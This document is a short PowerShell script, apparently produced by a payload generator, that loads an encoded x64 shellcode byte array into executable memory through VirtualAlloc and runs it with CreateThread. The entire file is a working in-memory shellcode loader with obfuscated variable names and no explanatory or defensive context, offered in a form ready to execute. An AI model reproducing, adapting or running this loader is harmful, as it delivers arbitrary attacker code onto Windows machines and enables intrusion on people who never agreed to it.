$AzGLlrhfGuw = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

$qJejyjgcxjqeYJm = Add-Type -memberDefinition $AzGLlrhfGuw -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $UyRpwDQEWRkgp = 0x48,0x31,0xc9,0x48,0x81,0xe9,0xb6,0xff,0xff,0xff,0x48,0x8d,0x5,0xef,0xff,0xff,0xff,0x48,0xbb,0x18,0x78,0x66,0x47,0x72,0x56,0xbc,0xa,0x48,0x31,0x58,0x27,0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x50,0x49,0xaf,0xf,0xf3,0xbf,0x7,0xf5,0xe7,0x87,0x2e,0xca,0x77,0xb9,0x43,0xf5,0xe7,0x30,0xdd,0xe,0xe8,0x15,0x68,0x34,0x37,0xa,0xf3,0xf,0x43,0xe,0x9b,0x42,0x35,0x80,0x99,0xb8,0x8d,0xb4,0x48,0xb,0xb3,0xf2,0xfa,0xf8,0xb4,0xe4,0xd6,0xbc,0x7d,0x73,0x3f,0x7c,0xb2,0xdb,0xd6,0xbc,0xca,0x80,0xab,0xfc,0x26,0x8d,0xa5,0x39,0xd7,0xb7,0xfa,0x48,0x5,0x3,0x61,0x6e,0x7a,0xc4,0x4d,0x86,0xbf,0xd0,0xcc,0x8e,0x7a,0x76,0xce,0xeb,0xc4,0xa8,0x30,0xc6,0xb8,0xc3,0x7f,0x53,0x5a,0xf9,0x66,0x8e,0xc8,0x40,0x5b,0x4b,0x83,0xfa,0x50,0x8e,0x72,0xc0,0x26,0x4b,0x83,0xfa,0x10,0x8e,0x72,0xe0,0x6e,0x4b,0x7,0x1f,0x7a,0x8c,0xb4,0xa3,0xf7,0x4b,0x39,0x68,0x9c,0xfa,0x98,0xee,0x3c,0x2f,0x28,0xe9,0xf1,0xf,0xf4,0xd3,0x3f,0xc2,0xea,0x45,0x62,0x87,0xa8,0xda,0xb5,0x51,0x28,0x23,0x72,0xfa,0xb1,0x93,0xee,0x65,0x89,0xd0,0x28,0xcd,0xfb,0x9d,0xbb,0x71,0x8,0xa8,0x30,0x4d,0x79,0x1a,0x3e,0x3,0x8,0xe0,0xb5,0x6,0x8d,0xf5,0x76,0x2,0xd8,0xf8,0xbb,0x8e,0xe1,0xd6,0xb5,0x43,0x28,0xe1,0x31,0x16,0x1a,0xc4,0x76,0xfc,0xc1,0xe9,0xbb,0xf2,0x71,0xda,0x3f,0xd5,0x45,0x99,0xf9,0x8e,0xc8,0x52,0x92,0x42,0xc9,0x61,0x3d,0x87,0xf8,0x53,0x6,0xe3,0x7d,0x59,0x7c,0xc5,0xb5,0xb6,0x36,0x46,0x31,0x79,0x45,0x1e,0xa1,0xd6,0xb5,0x43,0x2c,0xe1,0x31,0x16,0x9f,0xd3,0xb5,0xf,0x40,0xec,0xbb,0x86,0xe5,0xdb,0x3f,0xd3,0x49,0x23,0x34,0x4e,0xb1,0x93,0xee,0x42,0x50,0xe9,0x68,0x98,0xa0,0xc8,0x7f,0x5b,0x49,0xf1,0x71,0x9c,0xb1,0x11,0xd2,0x23,0x49,0xfa,0xcf,0x26,0xa1,0xd3,0x67,0x59,0x40,0x23,0x22,0x2f,0xb2,0x6d,0xc1,0xfc,0x55,0xe1,0x8e,0xb1,0x8a,0xa0,0x61,0x30,0x3a,0xa8,0x30,0x87,0xaf,0xdb,0xb7,0xe5,0x40,0x29,0xdc,0x66,0xf8,0x92,0x3e,0x4a,0x81,0x4d,0x79,0x7a,0xfb,0x92,0x2f,0x5d,0x2,0xa2,0x3e,0xc1,0xb8,0xc6,0x77,0x8a,0xec,0xe4,0xb9,0x37,0xb8,0x28,0x72,0x74,0x2e,0xaf,0xcf,0x13,0xb5,0x1b,0xd4,0x6b,0x9,0xa9,0x30,0xc6,0xa0,0xd3,0x84,0x2a,0x88,0xc3,0x30,0x39,0x2c,0xf8,0x3f,0x42,0x56,0xf8,0x60,0x8b,0xc8,0x5b,0x73,0x32,0xc8,0xe0,0xcf,0x6,0xb1,0x1b,0xfc,0x4b,0xf7,0x68,0x78,0x4f,0x38,0xd3,0x84,0xe9,0x7,0x77,0xd0,0x39,0x2c,0xda,0xb7,0xc4,0x62,0xb8,0x71,0x9e,0xb5,0x1b,0xdc,0x4b,0x81,0x51,0x71,0x7c,0x60,0x37,0x4a,0x62,0xf7,0x7d,0xb5,0x6,0x8d,0x98,0x77,0xfc,0xc6,0xdd,0xd5,0x2e,0x6a,0x92,0x3e,0x3,0x40,0x2b,0xdc,0xd6,0xb1,0x1b,0xdc,0x4e,0x39,0x61,0x5a,0xc2,0xb8,0xca,0x76,0x8a,0xf1,0xe9,0x8a,0xc4,0x20,0x5a,0x61,0xfc,0xdd,0x2b,0xc8,0xc6,0x87,0xc7,0x76,0x80,0xcc,0x88,0x6e,0x4f,0xf,0xf8,0x7e,0x42,0x51,0xc0,0x30,0xd6,0xf9,0x92,0x7f,0x5b,0x40,0x21,0xc2,0x8e,0xc8,0x5b,0x7f,0xb9,0x50,0xc,0x63,0x23,0x6,0x47,0x76,0x8a,0xcb,0xe1,0xb9,0x1,0xb4,0xa3,0xf7,0x4a,0x81,0x58,0x78,0x4f,0x23,0xda,0xb7,0xfa,0x49,0x12,0x32,0x1f,0x31,0xcd,0xc1,0xd6,0x8b,0x50,0x30,0xbb,0xd1,0xca,0x7f,0x54,0x51,0xc0,0x30,0x86,0xf9,0x92,0x7f,0x5b,0x62,0xa8,0x6a,0x87,0x43,0x99,0x11,0xc,0x38,0x57,0xe5,0x91,0xa0,0xd3,0x84,0x76,0x66,0xe5,0x51,0x39,0x2c,0xdb,0xc1,0xcd,0xe1,0x94,0xcf,0x39,0x6,0xda,0x3f,0xc0,0x40,0x81,0xf6,0x8e,0x7c,0x64,0x4b,0xb7,0x49,0x57,0xd7,0x9e,0x93,0x92,0x67,0x4a,0xcf,0x6a,0xc0,0x73,0x5b,0xc4,0xc1,0xd6,0x8,0xa8,0x29,0xa


$whiIlJeJYx = $qJejyjgcxjqeYJm::VirtualAlloc(0,[Math]::Max($UyRpwDQEWRkgp.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($UyRpwDQEWRkgp,0,$whiIlJeJYx,$UyRpwDQEWRkgp.Length)

$qJejyjgcxjqeYJm::CreateThread(0,0,$whiIlJeJYx,0,0,0)
